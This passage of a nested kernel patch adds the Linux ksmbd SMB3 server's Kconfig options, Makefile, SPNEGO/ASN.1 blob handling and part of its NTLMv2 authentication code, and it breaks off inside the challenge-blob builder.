++#define IO_REPARSE_TAG_LX_CHR_LE	cpu_to_le32(0x80000025)
++#define IO_REPARSE_TAG_LX_BLK_LE	cpu_to_le32(0x80000026)
++
++/* fsctl flags */
++/* If Flags is set to this value, the request is an FSCTL not ioctl request */
++#define SMB2_0_IOCTL_IS_FSCTL		0x00000001
++#endif /* __SMBFSCTL_H */
+diff --git a/fs/smb/server/Kconfig b/fs/smb/server/Kconfig
+new file mode 100644
+index 0000000000000..e1fe17747ed69
+--- /dev/null
++++ b/fs/smb/server/Kconfig
+@@ -0,0 +1,68 @@
++config SMB_SERVER
++	tristate "SMB3 server support (EXPERIMENTAL)"
++	depends on INET
++	depends on MULTIUSER
++	depends on FILE_LOCKING
++	select NLS
++	select NLS_UTF8
++	select CRYPTO
++	select CRYPTO_MD5
++	select CRYPTO_HMAC
++	select CRYPTO_ECB
++	select CRYPTO_LIB_DES
++	select CRYPTO_SHA256
++	select CRYPTO_CMAC
++	select CRYPTO_SHA512
++	select CRYPTO_AEAD2
++	select CRYPTO_CCM
++	select CRYPTO_GCM
++	select ASN1
++	select OID_REGISTRY
++	select CRC32
++	default n
++	help
++	  Choose Y here if you want to allow SMB3 compliant clients
++	  to access files residing on this system using SMB3 protocol.
++	  To compile the SMB3 server support as a module,
++	  choose M here: the module will be called ksmbd.
++
++	  You may choose to use a samba server instead, in which
++	  case you can choose N here.
++
++	  You also need to install user space programs which can be found
++	  in ksmbd-tools, available from
++	  https://github.com/cifsd-team/ksmbd-tools.
++	  More detail about how to run the ksmbd kernel server is
++	  available via README file
++	  (https://github.com/cifsd-team/ksmbd-tools/blob/master/README).
++
++	  ksmbd kernel server includes support for auto-negotiation,
++	  Secure negotiate, Pre-authentication integrity, oplock/lease,
++	  compound requests, multi-credit, packet signing, RDMA(smbdirect),
++	  smb3 encryption, copy-offload, secure per-user session
++	  establishment via NTLM or NTLMv2.
++
++config SMB_SERVER_SMBDIRECT
++	bool "Support for SMB Direct protocol"
++	depends on SMB_SERVER=m && INFINIBAND && INFINIBAND_ADDR_TRANS || SMB_SERVER=y && INFINIBAND=y && INFINIBAND_ADDR_TRANS=y
++	select SG_POOL
++	default n
++
++	help
++	  Enables SMB Direct support for SMB 3.0, 3.02 and 3.1.1.
++
++	  SMB Direct allows transferring SMB packets over RDMA. If unsure,
++	  say N.
++
++config SMB_SERVER_CHECK_CAP_NET_ADMIN
++	bool "Enable check network administration capability"
++	depends on SMB_SERVER
++	default y
++
++	help
++	  Prevent unprivileged processes to start the ksmbd kernel server.
++
++config SMB_SERVER_KERBEROS5
++	bool "Support for Kerberos 5"
++	depends on SMB_SERVER
++	default n
+diff --git a/fs/smb/server/Makefile b/fs/smb/server/Makefile
+new file mode 100644
+index 0000000000000..7d6337a7dee40
+--- /dev/null
++++ b/fs/smb/server/Makefile
+@@ -0,0 +1,20 @@
++# SPDX-License-Identifier: GPL-2.0-or-later
++#
++# Makefile for Linux SMB3 kernel server
++#
++obj-$(CONFIG_SMB_SERVER) += ksmbd.o
++
++ksmbd-y :=	unicode.o auth.o vfs.o vfs_cache.o server.o ndr.o \
++		misc.o oplock.o connection.o ksmbd_work.o crypto_ctx.o \
++		mgmt/ksmbd_ida.o mgmt/user_config.o mgmt/share_config.o \
++		mgmt/tree_connect.o mgmt/user_session.o smb_common.o \
++		transport_tcp.o transport_ipc.o smbacl.o smb2pdu.o \
++		smb2ops.o smb2misc.o ksmbd_spnego_negtokeninit.asn1.o \
++		ksmbd_spnego_negtokentarg.asn1.o asn1.o
++
++$(obj)/asn1.o: $(obj)/ksmbd_spnego_negtokeninit.asn1.h $(obj)/ksmbd_spnego_negtokentarg.asn1.h
++
++$(obj)/ksmbd_spnego_negtokeninit.asn1.o: $(obj)/ksmbd_spnego_negtokeninit.asn1.c $(obj)/ksmbd_spnego_negtokeninit.asn1.h
++$(obj)/ksmbd_spnego_negtokentarg.asn1.o: $(obj)/ksmbd_spnego_negtokentarg.asn1.c $(obj)/ksmbd_spnego_negtokentarg.asn1.h
++
++ksmbd-$(CONFIG_SMB_SERVER_SMBDIRECT) += transport_rdma.o
+diff --git a/fs/smb/server/asn1.c b/fs/smb/server/asn1.c
+new file mode 100644
+index 0000000000000..c03eba0903682
+--- /dev/null
++++ b/fs/smb/server/asn1.c
+@@ -0,0 +1,239 @@
++// SPDX-License-Identifier: GPL-2.0-or-later
++/*
++ * The ASB.1/BER parsing code is derived from ip_nat_snmp_basic.c which was in
++ * turn derived from the gxsnmp package by Gregory McLean & Jochen Friedrich
++ *
++ * Copyright (c) 2000 RP Internet (www.rpi.net.au).
++ */
++
++#include <linux/module.h>
++#include <linux/types.h>
++#include <linux/kernel.h>
++#include <linux/mm.h>
++#include <linux/slab.h>
++#include <linux/oid_registry.h>
++
++#include "glob.h"
++
++#include "asn1.h"
++#include "connection.h"
++#include "auth.h"
++#include "ksmbd_spnego_negtokeninit.asn1.h"
++#include "ksmbd_spnego_negtokentarg.asn1.h"
++
++#define NTLMSSP_OID_LEN  10
++
++static char NTLMSSP_OID_STR[NTLMSSP_OID_LEN] = { 0x2b, 0x06, 0x01, 0x04, 0x01,
++	0x82, 0x37, 0x02, 0x02, 0x0a };
++
++int
++ksmbd_decode_negTokenInit(unsigned char *security_blob, int length,
++			  struct ksmbd_conn *conn)
++{
++	return asn1_ber_decoder(&ksmbd_spnego_negtokeninit_decoder, conn,
++				security_blob, length);
++}
++
++int
++ksmbd_decode_negTokenTarg(unsigned char *security_blob, int length,
++			  struct ksmbd_conn *conn)
++{
++	return asn1_ber_decoder(&ksmbd_spnego_negtokentarg_decoder, conn,
++				security_blob, length);
++}
++
++static int compute_asn_hdr_len_bytes(int len)
++{
++	if (len > 0xFFFFFF)
++		return 4;
++	else if (len > 0xFFFF)
++		return 3;
++	else if (len > 0xFF)
++		return 2;
++	else if (len > 0x7F)
++		return 1;
++	else
++		return 0;
++}
++
++static void encode_asn_tag(char *buf, unsigned int *ofs, char tag, char seq,
++			   int length)
++{
++	int i;
++	int index = *ofs;
++	char hdr_len = compute_asn_hdr_len_bytes(length);
++	int len = length + 2 + hdr_len;
++
++	/* insert tag */
++	buf[index++] = tag;
++
++	if (!hdr_len) {
++		buf[index++] = len;
++	} else {
++		buf[index++] = 0x80 | hdr_len;
++		for (i = hdr_len - 1; i >= 0; i--)
++			buf[index++] = (len >> (i * 8)) & 0xFF;
++	}
++
++	/* insert seq */
++	len = len - (index - *ofs);
++	buf[index++] = seq;
++
++	if (!hdr_len) {
++		buf[index++] = len;
++	} else {
++		buf[index++] = 0x80 | hdr_len;
++		for (i = hdr_len - 1; i >= 0; i--)
++			buf[index++] = (len >> (i * 8)) & 0xFF;
++	}
++
++	*ofs += (index - *ofs);
++}
++
++int build_spnego_ntlmssp_neg_blob(unsigned char **pbuffer, u16 *buflen,
++				  char *ntlm_blob, int ntlm_blob_len)
++{
++	char *buf;
++	unsigned int ofs = 0;
++	int neg_result_len = 4 + compute_asn_hdr_len_bytes(1) * 2 + 1;
++	int oid_len = 4 + compute_asn_hdr_len_bytes(NTLMSSP_OID_LEN) * 2 +
++		NTLMSSP_OID_LEN;
++	int ntlmssp_len = 4 + compute_asn_hdr_len_bytes(ntlm_blob_len) * 2 +
++		ntlm_blob_len;
++	int total_len = 4 + compute_asn_hdr_len_bytes(neg_result_len +
++			oid_len + ntlmssp_len) * 2 +
++			neg_result_len + oid_len + ntlmssp_len;
++
++	buf = kmalloc(total_len, GFP_KERNEL);
++	if (!buf)
++		return -ENOMEM;
++
++	/* insert main gss header */
++	encode_asn_tag(buf, &ofs, 0xa1, 0x30, neg_result_len + oid_len +
++			ntlmssp_len);
++
++	/* insert neg result */
++	encode_asn_tag(buf, &ofs, 0xa0, 0x0a, 1);
++	buf[ofs++] = 1;
++
++	/* insert oid */
++	encode_asn_tag(buf, &ofs, 0xa1, 0x06, NTLMSSP_OID_LEN);
++	memcpy(buf + ofs, NTLMSSP_OID_STR, NTLMSSP_OID_LEN);
++	ofs += NTLMSSP_OID_LEN;
++
++	/* insert response token - ntlmssp blob */
++	encode_asn_tag(buf, &ofs, 0xa2, 0x04, ntlm_blob_len);
++	memcpy(buf + ofs, ntlm_blob, ntlm_blob_len);
++	ofs += ntlm_blob_len;
++
++	*pbuffer = buf;
++	*buflen = total_len;
++	return 0;
++}
++
++int build_spnego_ntlmssp_auth_blob(unsigned char **pbuffer, u16 *buflen,
++				   int neg_result)
++{
++	char *buf;
++	unsigned int ofs = 0;
++	int neg_result_len = 4 + compute_asn_hdr_len_bytes(1) * 2 + 1;
++	int total_len = 4 + compute_asn_hdr_len_bytes(neg_result_len) * 2 +
++		neg_result_len;
++
++	buf = kmalloc(total_len, GFP_KERNEL);
++	if (!buf)
++		return -ENOMEM;
++
++	/* insert main gss header */
++	encode_asn_tag(buf, &ofs, 0xa1, 0x30, neg_result_len);
++
++	/* insert neg result */
++	encode_asn_tag(buf, &ofs, 0xa0, 0x0a, 1);
++	if (neg_result)
++		buf[ofs++] = 2;
++	else
++		buf[ofs++] = 0;
++
++	*pbuffer = buf;
++	*buflen = total_len;
++	return 0;
++}
++
++int ksmbd_gssapi_this_mech(void *context, size_t hdrlen, unsigned char tag,
++			   const void *value, size_t vlen)
++{
++	enum OID oid;
++
++	oid = look_up_OID(value, vlen);
++	if (oid != OID_spnego) {
++		char buf[50];
++
++		sprint_oid(value, vlen, buf, sizeof(buf));
++		ksmbd_debug(AUTH, "Unexpected OID: %s\n", buf);
++		return -EBADMSG;
++	}
++
++	return 0;
++}
++
++int ksmbd_neg_token_init_mech_type(void *context, size_t hdrlen,
++				   unsigned char tag, const void *value,
++				   size_t vlen)
++{
++	struct ksmbd_conn *conn = context;
++	enum OID oid;
++	int mech_type;
++
++	oid = look_up_OID(value, vlen);
++	if (oid == OID_ntlmssp) {
++		mech_type = KSMBD_AUTH_NTLMSSP;
++	} else if (oid == OID_mskrb5) {
++		mech_type = KSMBD_AUTH_MSKRB5;
++	} else if (oid == OID_krb5) {
++		mech_type = KSMBD_AUTH_KRB5;
++	} else if (oid == OID_krb5u2u) {
++		mech_type = KSMBD_AUTH_KRB5U2U;
++	} else {
++		char buf[50];
++
++		sprint_oid(value, vlen, buf, sizeof(buf));
++		ksmbd_debug(AUTH, "Unexpected OID: %s\n", buf);
++		return -EBADMSG;
++	}
++
++	conn->auth_mechs |= mech_type;
++	if (conn->preferred_auth_mech == 0)
++		conn->preferred_auth_mech = mech_type;
++
++	return 0;
++}
++
++int ksmbd_neg_token_init_mech_token(void *context, size_t hdrlen,
++				    unsigned char tag, const void *value,
++				    size_t vlen)
++{
++	struct ksmbd_conn *conn = context;
++
++	conn->mechToken = kmalloc(vlen + 1, GFP_KERNEL);
++	if (!conn->mechToken)
++		return -ENOMEM;
++
++	memcpy(conn->mechToken, value, vlen);
++	conn->mechToken[vlen] = '\0';
++	return 0;
++}
++
++int ksmbd_neg_token_targ_resp_token(void *context, size_t hdrlen,
++				    unsigned char tag, const void *value,
++				    size_t vlen)
++{
++	struct ksmbd_conn *conn = context;
++
++	conn->mechToken = kmalloc(vlen + 1, GFP_KERNEL);
++	if (!conn->mechToken)
++		return -ENOMEM;
++
++	memcpy(conn->mechToken, value, vlen);
++	conn->mechToken[vlen] = '\0';
++	return 0;
++}
+diff --git a/fs/smb/server/asn1.h b/fs/smb/server/asn1.h
+new file mode 100644
+index 0000000000000..ce105f4ce305a
+--- /dev/null
++++ b/fs/smb/server/asn1.h
+@@ -0,0 +1,21 @@
++/* SPDX-License-Identifier: GPL-2.0-or-later */
++/*
++ * The ASB.1/BER parsing code is derived from ip_nat_snmp_basic.c which was in
++ * turn derived from the gxsnmp package by Gregory McLean & Jochen Friedrich
++ *
++ * Copyright (c) 2000 RP Internet (www.rpi.net.au).
++ * Copyright (C) 2018 Samsung Electronics Co., Ltd.
++ */
++
++#ifndef __ASN1_H__
++#define __ASN1_H__
++
++int ksmbd_decode_negTokenInit(unsigned char *security_blob, int length,
++			      struct ksmbd_conn *conn);
++int ksmbd_decode_negTokenTarg(unsigned char *security_blob, int length,
++			      struct ksmbd_conn *conn);
++int build_spnego_ntlmssp_neg_blob(unsigned char **pbuffer, u16 *buflen,
++				  char *ntlm_blob, int ntlm_blob_len);
++int build_spnego_ntlmssp_auth_blob(unsigned char **pbuffer, u16 *buflen,
++				   int neg_result);
++#endif /* __ASN1_H__ */
+diff --git a/fs/smb/server/auth.c b/fs/smb/server/auth.c
+new file mode 100644
+index 0000000000000..5e5e120edcc22
+--- /dev/null
++++ b/fs/smb/server/auth.c
+@@ -0,0 +1,1206 @@
++// SPDX-License-Identifier: GPL-2.0-or-later
++/*
++ *   Copyright (C) 2016 Namjae Jeon <linkinjeon@kernel.org>
++ *   Copyright (C) 2018 Samsung Electronics Co., Ltd.
++ */
++
++#include <linux/kernel.h>
++#include <linux/fs.h>
++#include <linux/uaccess.h>
++#include <linux/backing-dev.h>
++#include <linux/writeback.h>
++#include <linux/uio.h>
++#include <linux/xattr.h>
++#include <crypto/hash.h>
++#include <crypto/aead.h>
++#include <linux/random.h>
++#include <linux/scatterlist.h>
++
++#include "auth.h"
++#include "glob.h"
++
++#include <linux/fips.h>
++#include <crypto/des.h>
++
++#include "server.h"
++#include "smb_common.h"
++#include "connection.h"
++#include "mgmt/user_session.h"
++#include "mgmt/user_config.h"
++#include "crypto_ctx.h"
++#include "transport_ipc.h"
++#include "../common/arc4.h"
++
++/*
++ * Fixed format data defining GSS header and fixed string
++ * "not_defined_in_RFC4178@please_ignore".
++ * So sec blob data in neg phase could be generated statically.
++ */
++static char NEGOTIATE_GSS_HEADER[AUTH_GSS_LENGTH] = {
++#ifdef CONFIG_SMB_SERVER_KERBEROS5
++	0x60, 0x5e, 0x06, 0x06, 0x2b, 0x06, 0x01, 0x05,
++	0x05, 0x02, 0xa0, 0x54, 0x30, 0x52, 0xa0, 0x24,
++	0x30, 0x22, 0x06, 0x09, 0x2a, 0x86, 0x48, 0x86,
++	0xf7, 0x12, 0x01, 0x02, 0x02, 0x06, 0x09, 0x2a,
++	0x86, 0x48, 0x82, 0xf7, 0x12, 0x01, 0x02, 0x02,
++	0x06, 0x0a, 0x2b, 0x06, 0x01, 0x04, 0x01, 0x82,
++	0x37, 0x02, 0x02, 0x0a, 0xa3, 0x2a, 0x30, 0x28,
++	0xa0, 0x26, 0x1b, 0x24, 0x6e, 0x6f, 0x74, 0x5f,
++	0x64, 0x65, 0x66, 0x69, 0x6e, 0x65, 0x64, 0x5f,
++	0x69, 0x6e, 0x5f, 0x52, 0x46, 0x43, 0x34, 0x31,
++	0x37, 0x38, 0x40, 0x70, 0x6c, 0x65, 0x61, 0x73,
++	0x65, 0x5f, 0x69, 0x67, 0x6e, 0x6f, 0x72, 0x65
++#else
++	0x60, 0x48, 0x06, 0x06, 0x2b, 0x06, 0x01, 0x05,
++	0x05, 0x02, 0xa0, 0x3e, 0x30, 0x3c, 0xa0, 0x0e,
++	0x30, 0x0c, 0x06, 0x0a, 0x2b, 0x06, 0x01, 0x04,
++	0x01, 0x82, 0x37, 0x02, 0x02, 0x0a, 0xa3, 0x2a,
++	0x30, 0x28, 0xa0, 0x26, 0x1b, 0x24, 0x6e, 0x6f,
++	0x74, 0x5f, 0x64, 0x65, 0x66, 0x69, 0x6e, 0x65,
++	0x64, 0x5f, 0x69, 0x6e, 0x5f, 0x52, 0x46, 0x43,
++	0x34, 0x31, 0x37, 0x38, 0x40, 0x70, 0x6c, 0x65,
++	0x61, 0x73, 0x65, 0x5f, 0x69, 0x67, 0x6e, 0x6f,
++	0x72, 0x65
++#endif
++};
++
++void ksmbd_copy_gss_neg_header(void *buf)
++{
++	memcpy(buf, NEGOTIATE_GSS_HEADER, AUTH_GSS_LENGTH);
++}
++
++/**
++ * ksmbd_gen_sess_key() - function to generate session key
++ * @sess:	session of connection
++ * @hash:	source hash value to be used for find session key
++ * @hmac:	source hmac value to be used for finding session key
++ *
++ */
++static int ksmbd_gen_sess_key(struct ksmbd_session *sess, char *hash,
++			      char *hmac)
++{
++	struct ksmbd_crypto_ctx *ctx;
++	int rc;
++
++	ctx = ksmbd_crypto_ctx_find_hmacmd5();
++	if (!ctx) {
++		ksmbd_debug(AUTH, "could not crypto alloc hmacmd5\n");
++		return -ENOMEM;
++	}
++
++	rc = crypto_shash_setkey(CRYPTO_HMACMD5_TFM(ctx),
++				 hash,
++				 CIFS_HMAC_MD5_HASH_SIZE);
++	if (rc) {
++		ksmbd_debug(AUTH, "hmacmd5 set key fail error %d\n", rc);
++		goto out;
++	}
++
++	rc = crypto_shash_init(CRYPTO_HMACMD5(ctx));
++	if (rc) {
++		ksmbd_debug(AUTH, "could not init hmacmd5 error %d\n", rc);
++		goto out;
++	}
++
++	rc = crypto_shash_update(CRYPTO_HMACMD5(ctx),
++				 hmac,
++				 SMB2_NTLMV2_SESSKEY_SIZE);
++	if (rc) {
++		ksmbd_debug(AUTH, "Could not update with response error %d\n", rc);
++		goto out;
++	}
++
++	rc = crypto_shash_final(CRYPTO_HMACMD5(ctx), sess->sess_key);
++	if (rc) {
++		ksmbd_debug(AUTH, "Could not generate hmacmd5 hash error %d\n", rc);
++		goto out;
++	}
++
++out:
++	ksmbd_release_crypto_ctx(ctx);
++	return rc;
++}
++
++static int calc_ntlmv2_hash(struct ksmbd_conn *conn, struct ksmbd_session *sess,
++			    char *ntlmv2_hash, char *dname)
++{
++	int ret, len, conv_len;
++	wchar_t *domain = NULL;
++	__le16 *uniname = NULL;
++	struct ksmbd_crypto_ctx *ctx;
++
++	ctx = ksmbd_crypto_ctx_find_hmacmd5();
++	if (!ctx) {
++		ksmbd_debug(AUTH, "can't generate ntlmv2 hash\n");
++		return -ENOMEM;
++	}
++
++	ret = crypto_shash_setkey(CRYPTO_HMACMD5_TFM(ctx),
++				  user_passkey(sess->user),
++				  CIFS_ENCPWD_SIZE);
++	if (ret) {
++		ksmbd_debug(AUTH, "Could not set NT Hash as a key\n");
++		goto out;
++	}
++
++	ret = crypto_shash_init(CRYPTO_HMACMD5(ctx));
++	if (ret) {
++		ksmbd_debug(AUTH, "could not init hmacmd5\n");
++		goto out;
++	}
++
++	/* convert user_name to unicode */
++	len = strlen(user_name(sess->user));
++	uniname = kzalloc(2 + UNICODE_LEN(len), GFP_KERNEL);
++	if (!uniname) {
++		ret = -ENOMEM;
++		goto out;
++	}
++
++	conv_len = smb_strtoUTF16(uniname, user_name(sess->user), len,
++				  conn->local_nls);
++	if (conv_len < 0 || conv_len > len) {
++		ret = -EINVAL;
++		goto out;
++	}
++	UniStrupr(uniname);
++
++	ret = crypto_shash_update(CRYPTO_HMACMD5(ctx),
++				  (char *)uniname,
++				  UNICODE_LEN(conv_len));
++	if (ret) {
++		ksmbd_debug(AUTH, "Could not update with user\n");
++		goto out;
++	}
++
++	/* Convert domain name or conn name to unicode and uppercase */
++	len = strlen(dname);
++	domain = kzalloc(2 + UNICODE_LEN(len), GFP_KERNEL);
++	if (!domain) {
++		ret = -ENOMEM;
++		goto out;
++	}
++
++	conv_len = smb_strtoUTF16((__le16 *)domain, dname, len,
++				  conn->local_nls);
++	if (conv_len < 0 || conv_len > len) {
++		ret = -EINVAL;
++		goto out;
++	}
++
++	ret = crypto_shash_update(CRYPTO_HMACMD5(ctx),
++				  (char *)domain,
++				  UNICODE_LEN(conv_len));
++	if (ret) {
++		ksmbd_debug(AUTH, "Could not update with domain\n");
++		goto out;
++	}
++
++	ret = crypto_shash_final(CRYPTO_HMACMD5(ctx), ntlmv2_hash);
++	if (ret)
++		ksmbd_debug(AUTH, "Could not generate md5 hash\n");
++out:
++	kfree(uniname);
++	kfree(domain);
++	ksmbd_release_crypto_ctx(ctx);
++	return ret;
++}
++
++/**
++ * ksmbd_auth_ntlmv2() - NTLMv2 authentication handler
++ * @sess:	session of connection
++ * @ntlmv2:		NTLMv2 challenge response
++ * @blen:		NTLMv2 blob length
++ * @domain_name:	domain name
++ *
++ * Return:	0 on success, error number on error
++ */
++int ksmbd_auth_ntlmv2(struct ksmbd_conn *conn, struct ksmbd_session *sess,
++		      struct ntlmv2_resp *ntlmv2, int blen, char *domain_name,
++		      char *cryptkey)
++{
++	char ntlmv2_hash[CIFS_ENCPWD_SIZE];
++	char ntlmv2_rsp[CIFS_HMAC_MD5_HASH_SIZE];
++	struct ksmbd_crypto_ctx *ctx = NULL;
++	char *construct = NULL;
++	int rc, len;
++
++	rc = calc_ntlmv2_hash(conn, sess, ntlmv2_hash, domain_name);
++	if (rc) {
++		ksmbd_debug(AUTH, "could not get v2 hash rc %d\n", rc);
++		goto out;
++	}
++
++	ctx = ksmbd_crypto_ctx_find_hmacmd5();
++	if (!ctx) {
++		ksmbd_debug(AUTH, "could not crypto alloc hmacmd5\n");
++		return -ENOMEM;
++	}
++
++	rc = crypto_shash_setkey(CRYPTO_HMACMD5_TFM(ctx),
++				 ntlmv2_hash,
++				 CIFS_HMAC_MD5_HASH_SIZE);
++	if (rc) {
++		ksmbd_debug(AUTH, "Could not set NTLMV2 Hash as a key\n");
++		goto out;
++	}
++
++	rc = crypto_shash_init(CRYPTO_HMACMD5(ctx));
++	if (rc) {
++		ksmbd_debug(AUTH, "Could not init hmacmd5\n");
++		goto out;
++	}
++
++	len = CIFS_CRYPTO_KEY_SIZE + blen;
++	construct = kzalloc(len, GFP_KERNEL);
++	if (!construct) {
++		rc = -ENOMEM;
++		goto out;
++	}
++
++	memcpy(construct, cryptkey, CIFS_CRYPTO_KEY_SIZE);
++	memcpy(construct + CIFS_CRYPTO_KEY_SIZE, &ntlmv2->blob_signature, blen);
++
++	rc = crypto_shash_update(CRYPTO_HMACMD5(ctx), construct, len);
++	if (rc) {
++		ksmbd_debug(AUTH, "Could not update with response\n");
++		goto out;
++	}
++
++	rc = crypto_shash_final(CRYPTO_HMACMD5(ctx), ntlmv2_rsp);
++	if (rc) {
++		ksmbd_debug(AUTH, "Could not generate md5 hash\n");
++		goto out;
++	}
++	ksmbd_release_crypto_ctx(ctx);
++	ctx = NULL;
++
++	rc = ksmbd_gen_sess_key(sess, ntlmv2_hash, ntlmv2_rsp);
++	if (rc) {
++		ksmbd_debug(AUTH, "Could not generate sess key\n");
++		goto out;
++	}
++
++	if (memcmp(ntlmv2->ntlmv2_hash, ntlmv2_rsp, CIFS_HMAC_MD5_HASH_SIZE) != 0)
++		rc = -EINVAL;
++out:
++	if (ctx)
++		ksmbd_release_crypto_ctx(ctx);
++	kfree(construct);
++	return rc;
++}
++
++/**
++ * ksmbd_decode_ntlmssp_auth_blob() - helper function to construct
++ * authenticate blob
++ * @authblob:	authenticate blob source pointer
++ * @usr:	user details
++ * @sess:	session of connection
++ *
++ * Return:	0 on success, error number on error
++ */
++int ksmbd_decode_ntlmssp_auth_blob(struct authenticate_message *authblob,
++				   int blob_len, struct ksmbd_conn *conn,
++				   struct ksmbd_session *sess)
++{
++	char *domain_name;
++	unsigned int nt_off, dn_off;
++	unsigned short nt_len, dn_len;
++	int ret;
++
++	if (blob_len < sizeof(struct authenticate_message)) {
++		ksmbd_debug(AUTH, "negotiate blob len %d too small\n",
++			    blob_len);
++		return -EINVAL;
++	}
++
++	if (memcmp(authblob->Signature, "NTLMSSP", 8)) {
++		ksmbd_debug(AUTH, "blob signature incorrect %s\n",
++			    authblob->Signature);
++		return -EINVAL;
++	}
++
++	nt_off = le32_to_cpu(authblob->NtChallengeResponse.BufferOffset);
++	nt_len = le16_to_cpu(authblob->NtChallengeResponse.Length);
++	dn_off = le32_to_cpu(authblob->DomainName.BufferOffset);
++	dn_len = le16_to_cpu(authblob->DomainName.Length);
++
++	if (blob_len < (u64)dn_off + dn_len || blob_len < (u64)nt_off + nt_len ||
++	    nt_len < CIFS_ENCPWD_SIZE)
++		return -EINVAL;
++
++	/* TODO : use domain name that imported from configuration file */
++	domain_name = smb_strndup_from_utf16((const char *)authblob + dn_off,
++					     dn_len, true, conn->local_nls);
++	if (IS_ERR(domain_name))
++		return PTR_ERR(domain_name);
++
++	/* process NTLMv2 authentication */
++	ksmbd_debug(AUTH, "decode_ntlmssp_authenticate_blob dname%s\n",
++		    domain_name);
++	ret = ksmbd_auth_ntlmv2(conn, sess,
++				(struct ntlmv2_resp *)((char *)authblob + nt_off),
++				nt_len - CIFS_ENCPWD_SIZE,
++				domain_name, conn->ntlmssp.cryptkey);
++	kfree(domain_name);
++
++	/* The recovered secondary session key */
++	if (conn->ntlmssp.client_flags & NTLMSSP_NEGOTIATE_KEY_XCH) {
++		struct arc4_ctx *ctx_arc4;
++		unsigned int sess_key_off, sess_key_len;
++
++		sess_key_off = le32_to_cpu(authblob->SessionKey.BufferOffset);
++		sess_key_len = le16_to_cpu(authblob->SessionKey.Length);
++
++		if (blob_len < (u64)sess_key_off + sess_key_len)
++			return -EINVAL;
++
++		ctx_arc4 = kmalloc(sizeof(*ctx_arc4), GFP_KERNEL);
++		if (!ctx_arc4)
++			return -ENOMEM;
++
++		cifs_arc4_setkey(ctx_arc4, sess->sess_key,
++				 SMB2_NTLMV2_SESSKEY_SIZE);
++		cifs_arc4_crypt(ctx_arc4, sess->sess_key,
++				(char *)authblob + sess_key_off, sess_key_len);
++		kfree_sensitive(ctx_arc4);
++	}
++
++	return ret;
++}
++
++/**
++ * ksmbd_decode_ntlmssp_neg_blob() - helper function to construct
++ * negotiate blob
++ * @negblob: negotiate blob source pointer
++ * @rsp:     response header pointer to be updated
++ * @sess:    session of connection
++ *
++ */
++int ksmbd_decode_ntlmssp_neg_blob(struct negotiate_message *negblob,
++				  int blob_len, struct ksmbd_conn *conn)
++{
++	if (blob_len < sizeof(struct negotiate_message)) {
++		ksmbd_debug(AUTH, "negotiate blob len %d too small\n",
++			    blob_len);
++		return -EINVAL;
++	}
++
++	if (memcmp(negblob->Signature, "NTLMSSP", 8)) {
++		ksmbd_debug(AUTH, "blob signature incorrect %s\n",
++			    negblob->Signature);
++		return -EINVAL;
++	}
++
++	conn->ntlmssp.client_flags = le32_to_cpu(negblob->NegotiateFlags);
++	return 0;
++}
++
++/**
++ * ksmbd_build_ntlmssp_challenge_blob() - helper function to construct
++ * challenge blob
++ * @chgblob: challenge blob source pointer to initialize
++ * @rsp:     response header pointer to be updated
++ * @sess:    session of connection
++ *
++ */
++unsigned int
++ksmbd_build_ntlmssp_challenge_blob(struct challenge_message *chgblob,
++				   struct ksmbd_conn *conn)
++{
++	struct target_info *tinfo;
++	wchar_t *name;
++	__u8 *target_name;
++	unsigned int flags, blob_off, blob_len, type, target_info_len = 0;
++	int len, uni_len, conv_len;
++	int cflags = conn->ntlmssp.client_flags;
++
++	memcpy(chgblob->Signature, NTLMSSP_SIGNATURE, 8);
++	chgblob->MessageType = NtLmChallenge;
++
++	flags = NTLMSSP_NEGOTIATE_UNICODE |
++		NTLMSSP_NEGOTIATE_NTLM | NTLMSSP_TARGET_TYPE_SERVER |
++		NTLMSSP_NEGOTIATE_TARGET_INFO;
++
++	if (cflags & NTLMSSP_NEGOTIATE_SIGN) {
++		flags |= NTLMSSP_NEGOTIATE_SIGN;
++		flags |= cflags & (NTLMSSP_NEGOTIATE_128 |
++				   NTLMSSP_NEGOTIATE_56);
++	}
++
++	if (cflags & NTLMSSP_NEGOTIATE_SEAL && smb3_encryption_negotiated(conn))
++		flags |= NTLMSSP_NEGOTIATE_SEAL;
++
++	if (cflags & NTLMSSP_NEGOTIATE_ALWAYS_SIGN)
++		flags |= NTLMSSP_NEGOTIATE_ALWAYS_SIGN;
++
++	if (cflags & NTLMSSP_REQUEST_TARGET)
++		flags |= NTLMSSP_REQUEST_TARGET;
++
++	if (conn->use_spnego &&
++	    (cflags & NTLMSSP_NEGOTIATE_EXTENDED_SEC))
++		flags |= NTLMSSP_NEGOTIATE_EXTENDED_SEC;
++
++	if (cflags & NTLMSSP_NEGOTIATE_KEY_XCH)
++		flags |= NTLMSSP_NEGOTIATE_KEY_XCH;
++
++	chgblob->NegotiateFlags = cpu_to_le32(flags);
++	len = strlen(ksmbd_netbios_name());
++	name = kmalloc(2 + UNICODE_LEN(len), GFP_KERNEL);
++	if (!name)
++		return -ENOMEM;
++
++	conv_len = smb_strtoUTF16((__le16 *)name, ksmbd_netbios_name(), len,
++				  conn->local_nls);
++	if (conv_len < 0 || conv_len > len) {
++		kfree(name);
++		return -EINVAL;
++	}
++
++	uni_len = UNICODE_LEN(conv_len);
++
++	blob_off = sizeof(struct challenge_message);
++	blob_len = blob_off + uni_len;
++
++	chgblob->TargetName.Length = cpu_to_le16(uni_len);
++	chgblob->TargetName.MaximumLength = cpu_to_le16(uni_len);
++	chgblob->TargetName.BufferOffset = cpu_to_le32(blob_off);
++
++	/* Initialize random conn challenge */
++	get_random_bytes(conn->ntlmssp.cryptkey, sizeof(__u64));
++	memcpy(chgblob->Challenge, conn->ntlmssp.cryptkey,
++	       CIFS_CRYPTO_KEY_SIZE);
++
++	/* Add Target Information to security buffer */
++	chgblob->TargetInfoArray.BufferOffset = cpu_to_le32(blob_len);
++
++	target_name = (__u8 *)chgblob + blob_off;
++	memcpy(target_name, name, uni_len);
++	tinfo = (struct target_info *)(target_name + uni_len);
++
++	chgblob->TargetInfoArray.Length = 0;
++	/* Add target info list for NetBIOS/DNS settings */
++	for (type = NTLMSSP_AV_NB_COMPUTER_NAME;
++	     type <= NTLMSSP_AV_DNS_DOMAIN_NAME; type++) {
++		tinfo->Type = cpu_to_le16(type);
++		tinfo->Length = cpu_to_le16(uni_len);
++		memcpy(tinfo->Content, name, uni_len);
++		tinfo = (struct target_info *)((char *)tinfo + 4 + uni_len);
++		target_info_len += 4 + uni_len;
++	}
++
++	/* Add terminator subblock */
++	tinfo->Type = 0;
++	tinfo->Length = 0;
++	target_info_len += 4;
++
